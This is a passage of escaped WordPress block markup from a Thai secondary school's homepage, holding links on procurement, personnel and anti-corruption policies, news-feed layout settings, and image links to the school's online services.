{\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- 